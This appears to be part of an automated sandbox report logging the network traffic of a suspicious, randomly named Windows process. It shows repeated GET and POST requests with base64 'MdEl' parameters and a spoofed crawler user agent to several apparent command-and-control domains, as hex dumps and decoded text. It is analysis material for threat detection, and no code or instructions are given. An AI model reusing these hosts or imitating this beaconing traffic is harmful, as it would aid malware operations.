7a 34 6f 67 59 31 59 7a 41 55 70 35 69 59 57 51 52 6b 61 50 4b 2b 32 73 65 65 71 53 79 30 78 36 6e 49 69 5a 69 2b 6f 4f 47 39 6d 47 32 6e 71 64 54 33 4b 79 51 6a 71 6f 41 6b 56 4b 65 6e 55 62 4f 6d 7a 54 35 35 71 35 44 33 4a 72 4a 43 41 31 6b 42 62 50 47 4e 41 6b 57 2b 79 77 30 49 2b 5a 77 32 49 71 43 34 69 6a 33 65 6d 32 39 57 67 35 49 57 35 78 6f 44 39 67 69 58 43 55 4e 59 78 2f 4d 63 56 79 65 [TRUNCATED] Data Ascii: MdEl=wEVpZkHO0lSa6W/AvPfke0vSB4YDDHkFfCTFyqkat9Zk8PzvlxBtKWVlc9w9uxACLurHlarTvb2KFO3kXnnX02Fga5zkCDjIJqcT0PttxvJ8KoMFJMuzjaOHC+fy/2CSLtb+m+BweDzwSTOJswzCwWVOxWsDIc94e8TmQt4EH+v475UNFSyAPrEfM8CL8k/44rdq/xK/z4ogY1YzAUp5iYWQRkaPK+2seeqSy0x6nIiZi+oOG9mG2nqdT3KyQjqoAkVKenUbOmzT55q5D3JrJCA1kBbPGNAkW+yw0I+Zw2IqC4ij3em29Wg5IW5xoD9giXCUNYx/McVyetxAhu1uOMu/8MTci34AiR9Zi6iX86Rtn/CfNOaYmY7Ie6vdjdZ86CJiMIhdSVzB/r/JoW4d32mhCQO95+RFqGL/eCo/HLp6q/wov4CADOyPscemkyR3XJM+57MC0dC14JAxdbIV3pUFEBa4VoU/hpV3m06II8eTqlyFqEZV1zpd3u5XkcrcLe16RfpjDXwHDt8hlU0p67SFbVjLmF2/HfY//cojJJXE/wuUJr9FbwiicV7pngjxuH+U8Jr3yZ/5oPmkyirooQXi/L6ppLtjq4NT7qkt0JmUJffHE/IvxwjR5JL6pYPv7EO8sL7HnxZRdyG60c9Ial0fz5M0e0v0psdYK8pLTdKLijrUeELG3GnzWcfaXrv/4uHArQ9IbHYe8jEBtCbj8BXvKCS0YiCA2gR+12J4Rrd2vQNozt4Y5V63K9/x9K0LpKR0e8UVSnLDt+WnuZQo64AVhfl258WgVOcgjg8CyWZz4RcZ3EL5M+ehBcBb8JPfLBKlOM4tMJAZDAODttXnVSdHvYXwjhUEIUvNh7VwhEVh40VwpQLax8d0FAGwgJ9ARZn0VXsSok7sDVb6yavi1lFjXG8Cpt5VfdFMYLCYpkDfSjf0yE5j/sKEVwmvNAhoQm4itHcYES6jEj1M48x7fAtSnJcBpEhkWwqXJgydBffgx2r [TRUNCATED]
Jul 8, 2024 07:21:16.346019030 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 08 Jul 2024 05:21:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=sn9fjldhk78872d17hc1j2abjd; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Encoding: gzip Data Raw: 35 35 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 a5 57 cd 6e dc 36 10 3e db 4f c1 ea 50 b7 c0 ee ca 4e 93 d6 48 24 19 69 62 03 29 82 1c f2 07 f4 54 70 25 ee 8a 36 45 ca 24 b5 1b 3d 41 df a0 bd 14 bd 15 05 8a f6 d0 5b ef 79 95 22 e8 63 f4 1b 52 da 9f c0 09 02 78 61 60 b9 d2 cc 37 33 df fc d1 87 59 ed 1b 55 1c 66 b5 e0 55 71 78 90 79 e9 95 28 1e 9b 86 4b cd 5e 74 ae 15 da 49 a3 b3 34 be 80 44 23 3c 67 b5 f7 ed 54 5c 77 72 95 27 8f 8c f6 42 fb e9 cb be 15 09 2b e3 af 3c f1 e2 8d 4f 09 fd 01 2b 6b 6e 9d f0 79 e7 17 d3 d3 84 cc 28 a9 af 58 6d c5 22 3f 22 28 77 3f 4d 17 50 74 b3 a5 31 4b 25 78 2b dd ac 34 4d 5a 3a 77 b6 e0 8d 54 7d fe dc cc 8d 37 f7 ef 1e 1f 4f be 3a 3e 3e 62 56 a8 fc c8 f9 5e 09 57 0b e1 8f 98 87 fd fc 28 98 85 da 11 cc 8c 86 48 34 d9 8a 26 d1 72 52 71 cf d3 f8 38 7e cd a0 b7 75 ef 13 b4 14 bc 0c 2a 59 1a 09 cc e6 a6 ea 59 a9 b8 73 60 80 cf 95 98 ae 2d 6f 5b 61 03 ae 2b ad 6c 3d 73 b6 cc 93 31 ee f5 7a 3d 44 1d 22 b6 a2 e4 ad 07 63 29 48 98 5d ba b3 5a e5 42 27 45 96 46 e5 e2 f0 30 ab e4 6a [TRUNCATED] Data Ascii: 554Wn6>OPNH$ib)Tp%6E$=A[y"cRxa`73YUfUqxy(K^tI4D#<gT\wr'B+<O+kny(Xm"?"(w?MPt1K%x+4MZ:wT}7O:>>bV^W(H4&rRq8~uYYs`-o[a+l=s1z=D"c)H]ZB'EF0jF),Ik}\P8<8`QS'(=^2-m/I/O#<cZqd}1a'r,"9+OfY{yduz^lU#D^,DX@q,.,oB78E]y[_/({-}-X_~o\x\[TXhsfU""w9za>BwP{'7MC</R:&u4r!KY!q']-<zZgm8gK-8u\X7HDx97lOxjX]=0LC}-5+Y;k3k-#\|3O/<!:a0*D>@t7CPwL RxX'X{7c/.E s[`Nv-;h
Jul 8, 2024 07:21:16.346038103 CEST	506	IN	Data Raw: 2d 73 81 71 6d 98 32 88 d6 22 67 ce a8 95 80 8d 0b 84 12 f8 1f 52 03 13 06 8b 83 6c 50 96 07 41 a6 a9 c6 94 ea 27 ac c5 a2 74 62 f4 e3 83 a9 db a6 6a 00 1e 33 36 c2 0a a0 53 14 7b a4 44 52 e1 03 e1 a2 9b 16 c8 1e e4 b0 94 61 76 08 7b 4f 01 a8 25 Data Ascii: -sqm2"gRlPA'tbj36S{DRav{O%8bE% ;sr5RA$ajv%YM)p{7{N8kQ&'V6gszUxR\|E)77%esr]/W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49761	51.89.93.193	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:21:18.222791910 CEST	451	OUT	GET /wlsq/?MdEl=9G9JaQreu1q7pVWcrNT/fRK1XJwicXYdEWH52d0+9tQM8/+noicIREkWd/c/vCZ1acCjjeuAo42rGPHTfjnYjXAhd6PdeSH1Fptpw/53o/FvY9kFKM2jhZI=&cv4D=Bv0xSH88iTF48zS0 HTTP/1.1 Host: www.noghteyab.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Jul 8, 2024 07:21:18.865560055 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 08 Jul 2024 05:21:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ghcnt2l6ti7tr5k73pv0u5k5pl; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Data Raw: 31 30 31 63 0d 0a 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 53 75 73 70 65 6e 73 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 09 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 64 61 74 61 2f 73 74 79 6c 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 64 61 74 61 2f 73 74 79 6c 65 73 2f 6c 73 2e 63 73 73 22 3e 0a 3c 2f 68 65 [TRUNCATED] Data Ascii: 101c<html><head><title>Domain Suspension</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><link href='https://fonts.googleapis.com/css?family=Roboto:400,300' rel='stylesheet' type='text/css'><link rel="stylesheet" href="data/styles/style.css"><link rel="stylesheet" href="data/styles/ls.css"></head><body class="table-wrapper"><script src="https://www.google.com/recaptcha/api.js?hl=en"></script><div class="table-cell"><div id="container" style="position:relative;"><div id="country-select"> <form action=""> <select id="country-options" name="country-options"> <option selected="selected" title="//www.noghteyab.com/wlsq/?MdEl=9G9JaQreu1q7pVWcrNT/fRK1XJwicXYdEWH52d0+9tQM8/+noicIREkWd/c/vCZ1acCjjeuAo42rGPHTfjnYjXAhd6PdeSH1Fptpw/53o/FvY9kFKM2jhZI=&cv4D=Bv0xSH88iTF48zS0&lang=en" value="en">English</option> <option title
Jul 8, 2024 07:21:18.865581036 CEST	1236	IN	Data Raw: 3d 22 2f 2f 77 77 77 2e 6e 6f 67 68 74 65 79 61 62 2e 63 6f 6d 2f 77 6c 73 71 2f 3f 4d 64 45 6c 3d 39 47 39 4a 61 51 72 65 75 31 71 37 70 56 57 63 72 4e 54 2f 66 52 4b 31 58 4a 77 69 63 58 59 64 45 57 48 35 32 64 30 2b 39 74 51 4d 38 2f 2b 6e 6f Data Ascii: ="//www.noghteyab.com/wlsq/?MdEl=9G9JaQreu1q7pVWcrNT/fRK1XJwicXYdEWH52d0+9tQM8/+noicIREkWd/c/vCZ1acCjjeuAo42rGPHTfjnYjXAhd6PdeSH1Fptpw/53o/FvY9kFKM2jhZI=&cv4D=Bv0xSH88iTF48zS0&lang=fr" value="fr">Franais</option> <option title="//www.
Jul 8, 2024 07:21:18.865592957 CEST	1236	IN	Data Raw: 48 35 32 64 30 2b 39 74 51 4d 38 2f 2b 6e 6f 69 63 49 52 45 6b 57 64 2f 63 2f 76 43 5a 31 61 63 43 6a 6a 65 75 41 6f 34 32 72 47 50 48 54 66 6a 6e 59 6a 58 41 68 64 36 50 64 65 53 48 31 46 70 74 70 77 2f 35 33 6f 2f 46 76 59 39 6b 46 4b 4d 32 6a Data Ascii: H52d0+9tQM8/+noicIREkWd/c/vCZ1acCjjeuAo42rGPHTfjnYjXAhd6PdeSH1Fptpw/53o/FvY9kFKM2jhZI=&cv4D=Bv0xSH88iTF48zS0&lang=es" value="es">Espaol</option> </select> <input value="Select" type="submit" /> </form></div><h1>Domain Suspens
Jul 8, 2024 07:21:18.865629911 CEST	771	IN	Data Raw: 2e 3c 2f 70 3e 0a 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 0a 09 09 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 63 61 70 74 63 68 61 22 3e 0a 09 09 09 3c 70 3e 45 6e 74 65 72 20 74 68 65 20 74 65 78 74 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 Data Ascii: .</p></div><div id="captcha"><p>Enter the text displayed in the image below, then click the resend button to have another verification email sent to you. <br /> <span> (Letters are not case sensitive.)</span></p> <fo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49762	3.33.130.190	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:21:23.912621975 CEST	723	OUT	POST /22y6/ HTTP/1.1 Host: www.mcpcrecycling.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.mcpcrecycling.com Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 201 Referer: http://www.mcpcrecycling.com/22y6/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 46 41 47 34 38 46 5a 7a 4e 45 50 55 4e 70 49 4e 61 61 44 50 38 43 54 42 44 74 50 56 7a 31 4f 37 6f 42 4d 30 62 6c 6e 56 69 6b 50 53 31 47 43 6c 56 64 54 41 67 48 51 76 52 67 63 73 4b 46 31 6f 63 46 33 6d 6f 38 38 71 4f 6b 45 66 30 41 37 6d 79 4e 6e 66 4a 70 52 46 5a 56 44 38 44 68 4f 49 64 47 6b 33 61 34 54 71 7a 37 6a 48 38 4c 6f 42 6b 4c 35 33 35 76 6b 54 73 74 77 64 37 55 53 58 65 46 73 30 4d 61 57 77 47 47 75 49 4c 50 33 70 51 74 36 57 6e 76 51 65 38 4d 31 2b 67 76 78 39 42 37 44 6e 41 54 59 4c 33 61 49 76 64 63 79 55 61 52 59 71 36 2f 61 51 57 4f 2f 34 46 36 49 6e 33 41 3d 3d Data Ascii: MdEl=FAG48FZzNEPUNpINaaDP8CTBDtPVz1O7oBM0blnVikPS1GClVdTAgHQvRgcsKF1ocF3mo88qOkEf0A7myNnfJpRFZVD8DhOIdGk3a4Tqz7jH8LoBkL535vkTstwd7USXeFs0MaWwGGuILP3pQt6WnvQe8M1+gvx9B7DnATYL3aIvdcyUaRYq6/aQWO/4F6In3A==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49763	3.33.130.190	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:21:26.443448067 CEST	743	OUT	POST /22y6/ HTTP/1.1 Host: www.mcpcrecycling.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.mcpcrecycling.com Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 221 Referer: http://www.mcpcrecycling.com/22y6/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 46 41 47 34 38 46 5a 7a 4e 45 50 55 50 4a 34 4e 59 35 62 50 31 43 54 43 66 64 50 56 68 31 50 77 6f 42 41 30 62 6e 4c 37 69 32 37 53 30 6a 6d 6c 55 59 76 41 6a 48 51 76 57 51 64 6b 45 6c 31 6e 63 46 7a 51 6f 39 77 71 4f 6b 51 66 30 46 2f 6d 79 2b 66 63 47 5a 52 4c 4e 6c 44 45 4e 42 4f 49 64 47 6b 33 61 34 48 41 7a 37 37 48 38 37 59 42 6e 75 56 32 77 50 6b 51 6b 4e 77 64 2f 55 53 62 65 46 73 4b 4d 59 79 61 47 44 69 49 4c 4b 62 70 54 2f 65 58 74 76 51 59 68 38 30 69 77 2f 30 77 50 36 69 4d 46 46 63 52 2b 4a 6b 57 63 61 6a 4f 4c 67 35 39 6f 2f 2b 6a 4c 4a 32 4d 49 35 31 75 73 44 4d 4e 30 73 34 38 7a 53 45 57 7a 59 66 72 78 35 68 76 69 4a 38 3d Data Ascii: MdEl=FAG48FZzNEPUPJ4NY5bP1CTCfdPVh1PwoBA0bnL7i27S0jmlUYvAjHQvWQdkEl1ncFzQo9wqOkQf0F/my+fcGZRLNlDENBOIdGk3a4HAz77H87YBnuV2wPkQkNwd/USbeFsKMYyaGDiILKbpT/eXtvQYh80iw/0wP6iMFFcR+JkWcajOLg59o/+jLJ2MI51usDMN0s48zSEWzYfrx5hviJ8=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49764	3.33.130.190	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:21:28.971529961 CEST	10825	OUT	POST /22y6/ HTTP/1.1 Host: www.mcpcrecycling.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.mcpcrecycling.com Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 10301 Referer: http://www.mcpcrecycling.com/22y6/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 46 41 47 34 38 46 5a 7a 4e 45 50 55 50 4a 34 4e 59 35 62 50 31 43 54 43 66 64 50 56 68 31 50 77 6f 42 41 30 62 6e 4c 37 69 32 44 53 30 56 71 6c 56 2f 37 41 69 48 51 76 56 51 64 6e 45 6c 31 36 63 42 6e 4d 6f 39 73 36 4f 6d 6f 66 30 6a 44 6d 30 50 66 63 64 70 52 4c 53 31 44 2f 44 68 50 49 64 47 30 7a 61 34 58 41 7a 37 37 48 38 34 41 42 7a 4c 35 32 79 50 6b 54 73 74 77 52 37 55 54 4d 65 42 4a 78 4d 59 6d 67 47 51 71 49 4c 75 37 70 44 63 36 58 77 66 51 61 69 38 30 71 77 2b 4a 77 50 36 75 71 46 46 41 76 2b 4b 34 57 63 38 71 56 54 6b 6c 6e 35 4f 2b 59 66 36 75 59 47 65 4d 72 76 51 63 50 30 75 73 67 6e 54 64 31 6f 6f 79 35 6e 37 4e 50 33 5a 38 2f 37 42 67 51 49 78 56 79 54 4a 30 33 78 4c 4f 63 46 4f 55 4f 74 46 35 70 6f 4c 6b 69 39 41 79 58 52 2f 47 76 61 4c 76 45 76 6b 35 6c 47 45 31 37 76 51 46 75 33 44 71 68 7a 6e 68 39 55 57 42 53 37 45 65 79 63 6c 70 4d 52 6a 34 6d 48 54 45 47 2b 49 79 68 76 37 36 6c 67 69 30 59 78 48 37 7a 38 51 7a 35 6f 77 4a 51 79 44 56 67 54 79 74 66 73 35 51 67 72 [TRUNCATED] Data Ascii: MdEl=FAG48FZzNEPUPJ4NY5bP1CTCfdPVh1PwoBA0bnL7i2DS0VqlV/7AiHQvVQdnEl16cBnMo9s6Omof0jDm0PfcdpRLS1D/DhPIdG0za4XAz77H84ABzL52yPkTstwR7UTMeBJxMYmgGQqILu7pDc6XwfQai80qw+JwP6uqFFAv+K4Wc8qVTkln5O+Yf6uYGeMrvQcP0usgnTd1ooy5n7NP3Z8/7BgQIxVyTJ03xLOcFOUOtF5poLki9AyXR/GvaLvEvk5lGE17vQFu3Dqhznh9UWBS7EeyclpMRj4mHTEG+Iyhv76lgi0YxH7z8Qz5owJQyDVgTytfs5QgrSuhw99Vu8RKbvajhC5j/CJJuefobD53Yej0aD5F2xEJ/OrHXe5UrZcR1yJhd6APmZ2NFa5S9qAX6aNsm887A9S6BAMe5B3MiOC8SV6e674tuYCCEQnKnJVnzcZRQOCdzoli030qClORthEjQFpMlY62hpvnypPELqT/ckpho/U1t7cMpUolRgKjhQCMtagirc3YUoX8QESEfrWkbHr1Nm8fGJyeULKymlpaZyZToXmHR5VJhiPbTKg5GS+4WXeqbsBP0ii6lMvzHQx5L6jGVw+NFo7+Nk4OiXf5qUjJqT86wHY+J2Z4JJYTejW0zdOZZm5h4edm9R1HhmQyVUCvuF/Lk7ogNQ0rSKbTZpILyaqhg//2a5AV80nD32UPrqFvxMSWPJbKc70Add8QZQQyJR88G9PUl1aK0+zX9L1o5qJEFKE+7kh1pbAyrgTNwysGWTDFp6ByBYX6FSodNG4A7ZMViNCasqQeZ4w0QK6GKfPlQux7jvqPQDIrOhLOkbDXOxu1h42RB1dpfcRSQazIVU/Bl/fWYW6Ba4R6ucycnn2oFwTxRFyBU4y0BqahCPIHNfgeKrwJOuwfi9RbMKRptd7My6U0Ry1PMNWSDOsk3KyH4OBVlOBgTQNHgJu0fEEMXTnx4vgHnocmJaVDeiYwQJHu8wZQ8DpJEfC [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49765	3.33.130.190	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:21:31.503998041 CEST	455	OUT	GET /22y6/?MdEl=ICuY/wpnSFLYWqZeSYP5+XSCIc/V03at4BwQQiH2zV3f9F/XRNyagXQgakBjN0QcNA+3ga87AEREzxLt9aLMc602XFrpJHW0SVUWS6K0hYrp1sZ66M431O8=&cv4D=Bv0xSH88iTF48zS0 HTTP/1.1 Host: www.mcpcrecycling.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Jul 8, 2024 07:21:31.967791080 CEST	402	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 08 Jul 2024 05:21:31 GMT Content-Type: text/html Content-Length: 262 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4d 64 45 6c 3d 49 43 75 59 2f 77 70 6e 53 46 4c 59 57 71 5a 65 53 59 50 35 2b 58 53 43 49 63 2f 56 30 33 61 74 34 42 77 51 51 69 48 32 7a 56 33 66 39 46 2f 58 52 4e 79 61 67 58 51 67 61 6b 42 6a 4e 30 51 63 4e 41 2b 33 67 61 38 37 41 45 52 45 7a 78 4c 74 39 61 4c 4d 63 36 30 32 58 46 72 70 4a 48 57 30 53 56 55 57 53 36 4b 30 68 59 72 70 31 73 5a 36 36 4d 34 33 31 4f 38 3d 26 63 76 34 44 3d 42 76 30 78 53 48 38 38 69 54 46 34 38 7a 53 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?MdEl=ICuY/wpnSFLYWqZeSYP5+XSCIc/V03at4BwQQiH2zV3f9F/XRNyagXQgakBjN0QcNA+3ga87AEREzxLt9aLMc602XFrpJHW0SVUWS6K0hYrp1sZ66M431O8=&cv4D=Bv0xSH88iTF48zS0"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49766	188.114.96.3	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:21:37.003087044 CEST	717	OUT	POST /fwdd/ HTTP/1.1 Host: www.evoolihubs.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.evoolihubs.shop Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 201 Referer: http://www.evoolihubs.shop/fwdd/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 48 39 42 4b 45 64 34 2f 4a 62 64 43 57 2f 6c 4c 38 53 37 55 5a 76 79 59 2b 75 6d 51 6f 51 5a 37 47 62 52 35 56 70 69 6a 48 4f 53 76 41 48 65 51 63 33 76 62 6b 34 2b 4e 50 73 75 6a 44 51 50 71 4b 61 72 31 51 41 30 6d 7a 57 36 46 57 53 6b 5a 43 58 30 47 50 2f 52 41 4d 63 52 72 77 4b 53 2f 37 75 41 72 76 59 61 43 4b 4b 59 4e 35 71 34 36 4d 69 70 55 47 37 72 7a 37 2f 78 33 72 4f 61 52 6a 41 77 50 55 6b 2f 36 42 68 39 44 54 59 4d 6f 67 4c 33 61 34 30 78 59 57 42 47 77 33 42 62 4c 59 6a 37 51 6e 54 6c 6f 76 36 42 6c 4e 64 6a 4b 52 5a 30 68 7a 7a 50 54 50 32 70 55 54 44 6a 43 47 67 3d 3d Data Ascii: MdEl=H9BKEd4/JbdCW/lL8S7UZvyY+umQoQZ7GbR5VpijHOSvAHeQc3vbk4+NPsujDQPqKar1QA0mzW6FWSkZCX0GP/RAMcRrwKS/7uArvYaCKKYN5q46MipUG7rz7/x3rOaRjAwPUk/6Bh9DTYMogL3a40xYWBGw3BbLYj7QnTlov6BlNdjKRZ0hzzPTP2pUTDjCGg==
Jul 8, 2024 07:21:37.482023001 CEST	841	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 08 Jul 2024 05:21:37 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Mon, 08 Jul 2024 06:21:37 GMT Location: https://www.evoolihubs.shop/fwdd/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KhRHK0xIhpw0952g1z7cNjLTBSEWfTzGOTJqn0ftnWjBZlznPyZ2Gy5m6XLzfXG66QYA7phnnqdwtbZFRf9b44UZKbLGHCcfB8zOQkWWWj7oqO3w5KJ1tshOaZEb3zOWGHOfjE91"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 89fda1c0ea1f32fa-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49767	188.114.96.3	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:21:39.535772085 CEST	737	OUT	POST /fwdd/ HTTP/1.1 Host: www.evoolihubs.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.evoolihubs.shop Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 221 Referer: http://www.evoolihubs.shop/fwdd/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 48 39 42 4b 45 64 34 2f 4a 62 64 43 51 65 56 4c 2b 31 50 55 4d 2f 7a 71 39 75 6d 51 78 41 5a 46 47 62 4e 35 56 70 4b 4a 53 73 6d 76 41 6d 75 51 64 31 58 62 6c 34 2b 4e 46 4d 75 6d 63 41 50 74 4b 61 33 44 51 42 49 6d 7a 53 61 46 57 57 67 5a 42 6d 30 42 4a 76 52 4f 45 38 52 74 74 61 53 2f 37 75 41 72 76 63 4b 6f 4b 4b 41 4e 36 65 38 36 4b 44 70 62 4c 62 72 77 38 2f 78 33 39 2b 61 56 6a 41 77 74 55 68 62 41 42 6a 56 44 54 59 63 6f 67 65 58 5a 7a 30 78 6b 4c 78 48 56 6d 78 43 33 61 44 71 2b 68 42 67 4c 75 2b 4a 64 4d 62 79 51 41 6f 56 32 68 7a 72 67 53 78 67 67 65 41 65 4c 64 71 51 73 47 45 36 7a 48 